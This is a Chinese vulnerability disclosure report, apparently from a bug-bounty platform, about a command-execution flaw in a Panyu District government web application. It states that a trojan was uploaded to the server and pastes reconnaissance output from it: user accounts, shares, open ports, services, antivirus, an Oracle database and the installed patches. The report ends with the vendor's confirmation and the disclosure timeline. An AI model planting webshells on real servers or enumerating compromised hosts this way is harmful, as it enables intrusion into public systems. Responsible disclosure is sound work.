2015-11-17: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
广州市番禺区全区总面积529.94平方公里,辖6个镇、10个街道,有177个行政村、84个社区居委会,全区户籍人口80.6万人,登记在册外来人口113万人。2014年番禺区位列中国百强区第9名。[1] 具体简介 百度百科:广州市番禺区
打开官网地址http://**.**.**.**/点击标识链接
地址**.**.**.**:8080/qypj/qypj_queryOutPm.action存在命令执行漏洞
直接上传木马到服务器
[*] 磁盘列表 [ A:C:D:E:F: ]D:\tomcat-6.0.28\webapps\ROOT\> net user\\WIN-P12AEQTQ8LN 的用户帐户-------------------------------------------------------------------------------Administrator Guest 命令成功完成。D:\tomcat-6.0.28\webapps\ROOT\> net share共享名 资源 注解-------------------------------------------------------------------------------C$ C:\ 默认共享 D$ D:\ 默认共享 E$ E:\ 默认共享 IPC$ 远程 IPC ADMIN$ C:\Windows 远程管理 命令成功完成。D:\tomcat-6.0.28\webapps\ROOT\> net view列表是空的。D:\tomcat-6.0.28\webapps\ROOT\> netstat -ano活动连接 协议 本地地址 外部地址 状态 PID TCP **.**.**.**:80 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:135 **.**.**.**:0 LISTENING 716 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1158 **.**.**.**:0 LISTENING 2916 TCP **.**.**.**:1521 **.**.**.**:0 LISTENING 2816 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 2192 TCP **.**.**.**:3938 **.**.**.**:0 LISTENING 4460 TCP **.**.**.**:5520 **.**.**.**:0 LISTENING 2916 TCP **.**.**.**:5560 **.**.**.**:0 LISTENING 1928 TCP **.**.**.**:5580 **.**.**.**:0 LISTENING 1928 TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 1552 TCP **.**.**.**:9013 **.**.**.**:0 LISTENING 1552 TCP **.**.**.**:9081 **.**.**.**:0 LISTENING 1120 TCP **.**.**.**:47001 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 424 TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 804 TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 848 TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 536 TCP **.**.**.**:49156 **.**.**.**:0 LISTENING 528 TCP **.**.**.**:49170 **.**.**.**:0 LISTENING 1988 TCP **.**.**.**:49741 **.**.**.**:0 LISTENING 2864 TCP **.**.**.**:1521 **.**.**.**:62638 ESTABLISHED 2816 TCP **.**.**.**:1521 **.**.**.**:63001 TIME_WAIT 0 TCP **.**.**.**:1521 **.**.**.**:63002 ESTABLISHED 2816 TCP **.**.**.**:1521 **.**.**.**:63003 ESTABLISHED 2816 TCP **.**.**.**:9100 **.**.**.**:0 LISTENING 1552 TCP **.**.**.**:49162 **.**.**.**:0 LISTENING 2816 TCP **.**.**.**:61558 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:62638 **.**.**.**:1521 ESTABLISHED 1552 TCP **.**.**.**:63002 **.**.**.**:1521 ESTABLISHED 1552 TCP **.**.**.**:63003 **.**.**.**:1521 ESTABLISHED 1552 TCP **.**.**.**:135 **.**.**.**:4570 TIME_WAIT 0 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1521 **.**.**.**:49171 ESTABLISHED 2816 TCP **.**.**.**:1521 **.**.**.**:51056 ESTABLISHED 2816 TCP **.**.**.**:1521 **.**.**.**:51057 ESTABLISHED 2816 TCP **.**.**.**:1521 **.**.**.**:51058 ESTABLISHED 2816 TCP **.**.**.**:1521 **.**.**.**:51059 ESTABLISHED 2816 TCP **.**.**.**:1521 **.**.**.**:52506 ESTABLISHED 2816 TCP **.**.**.**:1521 **.**.**.**:52507 ESTABLISHED 2816 TCP **.**.**.**:3938 **.**.**.**:63061 TIME_WAIT 0 TCP **.**.**.**:3938 **.**.**.**:63063 TIME_WAIT 0 TCP **.**.**.**:3938 **.**.**.**:63066 TIME_WAIT 0 TCP **.**.**.**:3938 **.**.**.**:63068 TIME_WAIT 0 TCP **.**.**.**:8080 **.**.**.**:32397 FIN_WAIT_2 1552 TCP **.**.**.**:8080 **.**.**.**:32404 FIN_WAIT_2 1552 TCP **.**.**.**:8080 **.**.**.**:32415 ESTABLISHED 1552 TCP **.**.**.**:49171 **.**.**.**:1521 ESTABLISHED 1988 TCP **.**.**.**:51056 **.**.**.**:1521 ESTABLISHED 2916 TCP **.**.**.**:51057 **.**.**.**:1521 ESTABLISHED 2916 TCP **.**.**.**:51058 **.**.**.**:1521 ESTABLISHED 2916 TCP **.**.**.**:51059 **.**.**.**:1521 ESTABLISHED 2916 TCP **.**.**.**:52506 **.**.**.**:1521 ESTABLISHED 4460 TCP **.**.**.**:52507 **.**.**.**:1521 ESTABLISHED 4460 TCP **.**.**.**:63060 **.**.**.**:1158 TIME_WAIT 0 TCP **.**.**.**:63062 **.**.**.**:1158 TIME_WAIT 0 TCP **.**.**.**:63065 **.**.**.**:1158 TIME_WAIT 0 TCP **.**.**.**:63067 **.**.**.**:1158 TIME_WAIT 0 TCP [::]:80 [::]:0 LISTENING 4 TCP [::]:135 [::]:0 LISTENING 716 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:3389 [::]:0 LISTENING 2192 TCP [::]:8080 [::]:0 LISTENING 1552 TCP [::]:9013 [::]:0 LISTENING 1552 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 424 TCP [::]:49153 [::]:0 LISTENING 804 TCP [::]:49154 [::]:0 LISTENING 848 TCP [::]:49155 [::]:0 LISTENING 536 TCP [::]:49156 [::]:0 LISTENING 528 TCP [::]:49741 [::]:0 LISTENING 2864 UDP **.**.**.**:500 *:* 848 UDP **.**.**.**:4500 *:* 848 UDP **.**.**.**:5355 *:* 980 UDP **.**.**.**:9081 *:* 1120 UDP **.**.**.**:9082 *:* 1120 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP [::]:500 *:* 848 UDP [::]:4500 *:* 848 UDP [::]:5355 *:* 980D:\tomcat-6.0.28\webapps\ROOT\> tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 244 暂缺 csrss.exe 360 暂缺 csrss.exe 416 暂缺 wininit.exe 424 暂缺 winlogon.exe 456 暂缺 services.exe 528 暂缺 lsass.exe 536 SamSs lsm.exe 544 暂缺 svchost.exe 640 DcomLaunch, PlugPlay, Power svchost.exe 716 RpcEptMapper, RpcSs svchost.exe 804 Dhcp, eventlog, lmhosts svchost.exe 848 AeLookupSvc, AppMgmt, CertPropSvc, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, SessionEnv, ShellHWDetection, Winmgmt, wuauserv svchost.exe 896 EventSystem, fdPHost, FontCache, netprofm, nsi svchost.exe 940 Netman, TrkWks, UmRdpService, UxSms svchost.exe 980 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM svchost.exe 300 BFE, DPS, MpsSvc spoolsv.exe 868 Spooler svchost.exe 1056 AppHostSvc EngineServer.exe 1080 McAfeeEngineService FrameworkService.exe 1120 McAfeeFramework VsTskMgr.exe 1216 McTaskManager mfevtps.exe 1292 mfevtp SMSvcHost.exe 1320 NetPipeActivator, NetTcpActivator, NetTcpPortSharing svchost.exe 1492 RemoteRegistry svchost.exe 1520 W3SVC, WAS McShield.exe 1564 McShield mfeann.exe 1664 暂缺 conhost.exe 1676 暂缺 vmtoolsd.exe 1684 VMTools svchost.exe 2192 TermService dllhost.exe 2304 COMSysApp msdtc.exe 2432 MSDTC taskhost.exe 2736 暂缺 dwm.exe 2840 暂缺 explorer.exe 2848 暂缺 VMwareTray.exe 3000 暂缺 vmtoolsd.exe 3008 暂缺 UdaterUI.exe 2340 暂缺 shstat.exe 2368 暂缺 csrss.exe 2416 暂缺 winlogon.exe 2400 暂缺 LogonUI.exe 1824 暂缺 rdpclip.exe 2184 暂缺 TNSLSNR.EXE 2816 OracleOraDb10g_home1TNSListener oracle.exe 1988 OracleServiceORCL nmesrvc.exe 3688 OracleDBConsoleorcl conhost.exe 352 暂缺 cmd.exe 3980 暂缺 perl.exe 3984 暂缺 isqlplussvc.exe 3152 OracleOraDb10g_home1iSQL*Plus java.exe 1928 暂缺 conhost.exe 3536 暂缺 java.exe 3296 暂缺 conhost.exe 3824 暂缺 iexplore.exe 3656 暂缺 iexplore.exe 3348 暂缺 svchost.exe 2864 PolicyAgent iexplore.exe 2956 暂缺 iexplore.exe 1192 暂缺 iexplore.exe 3740 暂缺 iexplore.exe 288 暂缺 java.exe 2916 暂缺 conhost.exe 4068 暂缺 java.exe 1552 暂缺 conhost.exe 5064 暂缺 emagent.exe 4460 暂缺 naPrdMgr.exe 4500 暂缺 cmd.exe 2084 暂缺 conhost.exe 4852 暂缺 tasklist.exe 3400 暂缺 WmiPrvSE.exe 1904 暂缺 D:\tomcat-6.0.28\webapps\ROOT\> net start已经启动以下 Windows 服务: Application Experience Application Host Helper Service Application Management Base Filtering Engine Certificate Propagation COM+ Event System COM+ System Application Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client Function Discovery Provider Host Group Policy Client IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent McAfee Engine Service McAfee Framework 服务 McAfee McShield McAfee Task Manager McAfee Validation Trust Protection Service Net.Pipe Listener Adapter Net.Tcp Listener Adapter Net.Tcp Port Sharing Service Network Connections Network List Service Network Location Awareness Network Store Interface Service OracleDBConsoleorcl OracleOraDb10g_home1iSQL*Plus OracleOraDb10g_home1TNSListener OracleServiceORCL Plug and Play Power Print Spooler Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector Remote Procedure Call (RPC) Remote Registry RPC Endpoint Mapper Security Accounts Manager Server Shell Hardware Detection System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper User Profile Service VMware Tools Service Windows Event Log Windows Firewall Windows Font Cache Service Windows Management Instrumentation Windows Process Activation Service Windows Remote Management (WS-Management) Windows Update Workstation World Wide Web Publishing Service命令成功完成。D:\tomcat-6.0.28\webapps\ROOT\> ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : WIN-P12AEQTQ8LN 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection 物理地址. . . . . . . . . . . . . : 00-50-56-A4-57-20 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::fcab:7a11:9dff:9b0%11(首选) IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : **.**.**.** DHCPv6 IAID . . . . . . . . . . . : 234901590 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1D-2F-88-6A-00-50-56-A4-57-20 DNS 服务器 . . . . . . . . . . . : **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 isatap.{C23CE8DC-D80B-4F0A-8098-317A9F0324B7}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 Teredo Tunneling Pseudo-Interface: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是D:\tomcat-6.0.28\webapps\ROOT\> systeminfo主机名: WIN-P12AEQTQ8LNOS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 00486-001-0001076-84596初始安装日期: 2015/3/4, 2:43:15系统启动时间: 2015/7/9, 9:49:49系统制造商: VMware, Inc.系统型号: VMware7,1系统类型: x64-based PC处理器: 安装了 1 个处理器。 [01]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~2660 MhzBIOS 版本: VMware, Inc. VMW71.00V.0.B64.1208032308, 2012/8/3Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 4,095 MB可用的物理内存: 2,653 MB虚拟内存: 最大值: 8,188 MB虚拟内存: 可用: 5,038 MB虚拟内存: 使用中: 3,150 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: \\WIN-P12AEQTQ8LN修补程序: 安装了 186 个修补程序。 [01]: KB981391 [02]: KB981392 [03]: KB977236 [04]: KB981111 [05]: KB977238 [06]: KB2849697 [07]: KB2849696 [08]: KB2841134 [09]: KB2841134 [10]: KB977239 [11]: KB2670838 [12]: KB981390 [13]: KB2479943 [14]: KB2506014 [15]: KB2506212 [16]: KB2506928 [17]: KB2509553 [18]: KB2511455 [19]: KB2533552 [20]: KB2536275 [21]: KB2536276 [22]: KB2544893 [23]: KB2545698 [24]: KB2547666 [25]: KB2552343 [26]: KB2560656 [27]: KB2563227 [28]: KB2564958 [29]: KB2570947 [30]: KB2585542 [31]: KB2603229 [32]: KB2604115 [33]: KB2607047 [34]: KB2608658 [35]: KB2620704 [36]: KB2621440 [37]: KB2631813 [38]: KB2640148 [39]: KB2643719 [40]: KB2653956 [41]: KB2654428 [42]: KB2656356 [43]: KB2660075 [44]: KB2667402 [45]: KB2676562 [46]: KB2685811 [47]: KB2685813 [48]: KB2685939 [49]: KB2690533 [50]: KB2698365 [51]: KB2705219 [52]: KB2706045 [53]: KB2712808 [54]: KB2718704 [55]: KB2719033 [56]: KB2719857 [57]: KB2726535 [58]: KB2727528 [59]: KB2729094 [60]: KB2729452 [61]: KB2732059 [62]: KB2736422 [63]: KB2742599 [64]: KB2750841 [65]: KB2758857 [66]: KB2761217 [67]: KB2763523 [68]: KB2765809 [69]: KB2770660 [70]: KB2786081 [71]: KB2789645 [72]: KB2791765 [73]: KB2798162 [74]: KB2800095 [75]: KB2803821 [76]: KB2807986 [77]: KB2808679 [78]: KB2813347 [79]: KB2813430 [80]: KB2820331 [81]: KB2832414 [82]: KB2834140 [83]: KB2836942 [84]: KB2836943 [85]: KB2839894 [86]: KB2840149 [87]: KB2840631 [88]: KB2843630 [89]: KB2846960 [90]: KB2847077 [91]: KB2847311 [92]: KB2847927 [93]: KB2852386 [94]: KB2853952 [95]: KB2855844 [96]: KB2861191 [97]: KB2861698 [98]: KB2862152 [99]: KB2862330 [100]: KB2862335 [101]: KB2862966 [102]: KB2862973 [103]: KB2864058 [104]: KB2864202 [105]: KB2868038 [106]: KB2868116 [107]: KB2868626 [108]: KB2871997 [109]: KB2872339 [110]: KB2882822 [111]: KB2884256 [112]: KB2887069 [113]: KB2888049 [114]: KB2891804 [115]: KB2892074 [116]: KB2893294 [117]: KB2893519 [118]: KB2894844 [119]: KB2900986 [120]: KB2908783 [121]: KB2911501 [122]: KB2918614 [123]: KB2919469 [124]: KB2922229 [125]: KB2926765 [126]: KB2928562 [127]: KB2929733 [128]: KB2931356 [129]: KB2937610 [130]: KB2939576 [131]: KB2943357 [132]: KB2957189 [133]: KB2957503 [134]: KB2957509 [135]: KB2961072 [136]: KB2966583 [137]: KB2968294 [138]: KB2971850 [139]: KB2972100 [140]: KB2972211 [141]: KB2972280 [142]: KB2973112 [143]: KB2973201 [144]: KB2973351 [145]: KB2976897 [146]: KB2977292 [147]: KB2978120 [148]: KB2978668 [149]: KB2979570 [150]: KB2980245 [151]: KB2984972 [152]: KB2985461 [153]: KB2991963 [154]: KB2992611 [155]: KB2993651 [156]: KB2993958 [157]: KB3003743 [158]: KB3004361 [159]: KB3004375 [160]: KB3004394 [161]: KB3005607 [162]: KB3005788 [163]: KB3006121 [164]: KB3006137 [165]: KB3006226 [166]: KB3006625 [167]: KB3008627 [168]: KB3009736 [169]: KB3010788 [170]: KB3011780 [171]: KB3013410 [172]: KB3013455 [173]: KB3014029 [174]: KB3014406 [175]: KB3018238 [176]: KB3019215 [177]: KB3019978 [178]: KB3020338 [179]: KB3021674 [180]: KB3021952 [181]: KB3022777 [182]: KB3023562 [183]: KB3029944 [184]: KB3031432 [185]: KB958488 [186]: KB976902网卡: 安装了 1 个 NIC。 [01]: Intel(R) PRO/1000 MT Network Connection 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: fe80::fcab:7a11:9dff:9b0D:\tomcat-6.0.28\webapps\ROOT\>
加强安全意识
危害等级:高
漏洞Rank:12
确认时间:2015-11-24 12:07
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:12正在联系相关网站管理单位处置。
暂无
